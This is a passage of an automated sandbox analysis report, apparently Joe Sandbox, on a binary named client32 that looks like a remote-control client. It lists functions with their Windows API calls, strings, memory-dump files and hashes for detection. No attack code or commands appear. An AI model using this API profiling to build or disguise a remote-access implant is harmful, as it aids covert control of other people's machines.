                                                                                                                                    Function 11114590 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93keyboardsleepwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 111145D5
                                                                                                                                    • GetKeyState.USER32(00000090), ref: 11114600
                                                                                                                                      • Part of subcall function 11113190: DeviceIoControl.KERNEL32 ref: 111131E2
                                                                                                                                      • Part of subcall function 11113190: keybd_event.USER32 ref: 11113215
                                                                                                                                    • GetKeyState.USER32(00000014), ref: 1111464C
                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 1111466E
                                                                                                                                    • GetKeyState.USER32(00000091), ref: 111146A4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$ControlDeviceMessagePeekSleepkeybd_event
                                                                                                                                    • String ID: DisableSyncCapsLock$DisableSyncNumLock$DisableSyncScrollLock$View
                                                                                                                                    • API String ID: 2472460971-451981794
                                                                                                                                    • Opcode ID: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                                                                                    • Instruction ID: 124f8e62a6da658c60687918a6121e4bc492e5a03fd0ed5725fd2557b003e167
                                                                                                                                    • Opcode Fuzzy Hash: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                                                                                    • Instruction Fuzzy Hash: 6131D93478074297E320DB34CD45B9AF7E5AB4470CF004829E79A5E6C9EB79B940C79A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110934A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(11148360), ref: 110934A9
                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110934D9
                                                                                                                                    • FindWindowA.USER32 ref: 110934EA
                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 110934F1
                                                                                                                                      • Part of subcall function 11091920: GlobalAddAtomA.KERNEL32 ref: 11091982
                                                                                                                                      • Part of subcall function 11093410: GetClassInfoA.USER32 ref: 11093424
                                                                                                                                      • Part of subcall function 11091A50: CreateWindowExA.USER32 ref: 11091A9D
                                                                                                                                      • Part of subcall function 11091A50: UpdateWindow.USER32(?), ref: 11091AEF
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093531
                                                                                                                                      • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B1A
                                                                                                                                      • Part of subcall function 11091B00: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                                                                      • Part of subcall function 11091B00: TranslateMessage.USER32(?), ref: 11091B51
                                                                                                                                      • Part of subcall function 11091B00: DispatchMessageA.USER32 ref: 11091B5B
                                                                                                                                      • Part of subcall function 11091B00: GetMessageA.USER32 ref: 11091B6B
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093555
                                                                                                                                      • Part of subcall function 110919C0: GlobalDeleteAtom.KERNEL32 ref: 110919FE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdatewsprintf
                                                                                                                                    • String ID: NSMClassList$NSMFindClassEvent
                                                                                                                                    • API String ID: 276154791-2883797795
                                                                                                                                    • Opcode ID: 9549c3d145b0240db6d30153ba57302aac54058b0607cbb0247713cba2d24a1f
                                                                                                                                    • Instruction ID: 4b33314c0ec69eaaabe86fb2bb0f057967e6cef17922574bfca5772aa51aa607
                                                                                                                                    • Opcode Fuzzy Hash: 9549c3d145b0240db6d30153ba57302aac54058b0607cbb0247713cba2d24a1f
                                                                                                                                    • Instruction Fuzzy Hash: E911C639F4822D67EB15A3F51D29B9FBA985B44BA8F010024F92DDA580EF64F400E6A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11148360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 74keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,1102EA98,?), ref: 1114837D
                                                                                                                                    • wsprintfA.USER32 ref: 1114839B
                                                                                                                                    • OutputDebugStringA.KERNEL32(?,?,1102EA98,?), ref: 111483B1
                                                                                                                                      • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                                                                      • Part of subcall function 11148010: GetCurrentThreadId.KERNEL32 ref: 11148023
                                                                                                                                      • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480A3
                                                                                                                                      • Part of subcall function 11148010: IsBadReadPtr.KERNEL32(?,00000001), ref: 111480C8
                                                                                                                                      • Part of subcall function 11148010: wsprintfA.USER32 ref: 111480E8
                                                                                                                                      • Part of subcall function 11148010: wsprintfA.USER32 ref: 11148105
                                                                                                                                    • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F6
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,1102EA98,?), ref: 111483F9
                                                                                                                                      • Part of subcall function 110B7F30: GetLastError.KERNEL32(1111025B,11195AD8,?,?,11029B81,?,11195AD8,1111025B,00000000), ref: 110B7F5C
                                                                                                                                      • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FBD
                                                                                                                                      • Part of subcall function 110B7F30: GetTickCount.KERNEL32 ref: 110B7FE8
                                                                                                                                      • Part of subcall function 110B7F30: GetMessageA.USER32 ref: 110B800C
                                                                                                                                      • Part of subcall function 110B7F30: TranslateMessage.USER32(?), ref: 110B8015
                                                                                                                                      • Part of subcall function 110B7F30: DispatchMessageA.USER32 ref: 110B801E
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 11148419
                                                                                                                                    Strings
                                                                                                                                    • Exception caught at %x. Trying minidump., xrefs: 11148395
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$CountErrorLastMessageTick$DebugOutputString$CurrentDispatchReadStateThreadTranslate
                                                                                                                                    • String ID: Exception caught at %x. Trying minidump.
                                                                                                                                    • API String ID: 3480906701-543155386
                                                                                                                                    • Opcode ID: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                                                                                    • Instruction ID: 29a59b4c4c914cd8c532226d15f5e4317bff798f4e19c00b73adffff4a71f3ad
                                                                                                                                    • Opcode Fuzzy Hash: a73f62b9da39a5c4804c9e0f52be66233fdaa3bbbff3939df8d171118b33f9c2
                                                                                                                                    • Instruction Fuzzy Hash: 3121F875D002189BD715DBA4DDC0FD9F3B8EB1C709F0040A8EA1597A84DBB06E84CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1117D104 Relevance: 9.2, APIs: 6, Instructions: 156memoryfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11176489: SetFilePointer.KERNEL32(00000000,00BFBBEF,00000003,00000010,00BFBBEF,00BFBBEF,1117A3D8,1117A3D8,?,11172A7A,00BFBBEF,00000000,00000000,00000002,110B8279,00000000), ref: 111764CB
                                                                                                                                      • Part of subcall function 11176489: GetLastError.KERNEL32(?,11172A7A,00BFBBEF,00000000,00000000,00000002,110B8279,00000000,110B8279,?,11173139,110B8279,?,00070000,111DD358,00000010), ref: 111764D8
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2,00000109,00000000), ref: 1117D16D
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2,00000109,00000000), ref: 1117D174
                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2), ref: 1117D1F0
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2,00000109), ref: 1117D1F7
                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2), ref: 1117D252
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,1117A1A2,00000109), ref: 1117D27F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1354853467-0
                                                                                                                                    • Opcode ID: ad16001c2b715ce970d6d41160b4da2a5bfd5fbe30d7f7b7da528beea73ff139
                                                                                                                                    • Instruction ID: 1c1b5c185febf8e9c282cd29c73f59a088a86a84eb42be85f6b12db9bfd6f2d8
                                                                                                                                    • Opcode Fuzzy Hash: ad16001c2b715ce970d6d41160b4da2a5bfd5fbe30d7f7b7da528beea73ff139
                                                                                                                                    • Instruction Fuzzy Hash: 1E41FF7394021EABEF012FB8DD4159DFFA6EF00378F514224F934A73A0E67599528B90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111746A1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,11174CDE,?,11165D75,?,000000BC,?,00000001,00000000,00000000), ref: 111746E0
                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,11174CDE,?,11165D75,?,000000BC,?,00000001,00000000,00000000), ref: 11174709
                                                                                                                                    • GetACP.KERNEL32(?,?,11174CDE,?,11165D75,?,000000BC,?,00000001,00000000), ref: 1117471D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLocale
                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                    • Opcode ID: 46910ca2344210847ee62799510373340a670fbd9de7f23042de516690cffa6d
                                                                                                                                    • Instruction ID: 529805c0a81cd742135a434bdeaba5643369e4968e6a1fba3a43e1cdf4cb7d2c
                                                                                                                                    • Opcode Fuzzy Hash: 46910ca2344210847ee62799510373340a670fbd9de7f23042de516690cffa6d
                                                                                                                                    • Instruction Fuzzy Hash: B701DF3478465BFAF7218F61DE05B9AF7ACAF0171DF204024F181E1980EBA0DA42C794
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                                                    • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountIconicTick
                                                                                                                                    • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                                                    • API String ID: 1307367305-2838568823
                                                                                                                                    • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                                    • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                                                    • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                                    • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                                                                    • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                                                                    • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$BringCurrentIconicShowThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4184413098-0
                                                                                                                                    • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                                    • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                                                                                    • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                                                                                    • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110EE230 Relevance: 4.5, APIs: 3, Instructions: 27memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DescriptorSecurity$AllocDaclInitializeLocal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1946635556-0
                                                                                                                                    • Opcode ID: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
                                                                                                                                    • Instruction ID: 48c328ce5276e0414f5d06d79fad6670dbdd187e0f7480751a5c204fdfa869f7
                                                                                                                                    • Opcode Fuzzy Hash: 6e59face588754e8aeec168d01ccd83def4bd6ed2e133d5a94f45f1223fcfbb6
                                                                                                                                    • Instruction Fuzzy Hash: ACF0127068031A9FE7148F64C9D9F80B7E8A716B08F144064F6259B2D4D6B1D4428B14
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1105A760 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105ADFA,DuplicateHandle), ref: 1105A771
                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105ADFA,DuplicateHandle), ref: 1105A77F
                                                                                                                                    • LocalFree.KERNEL32(?,?,?,1105ADFA,DuplicateHandle), ref: 1105A789
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
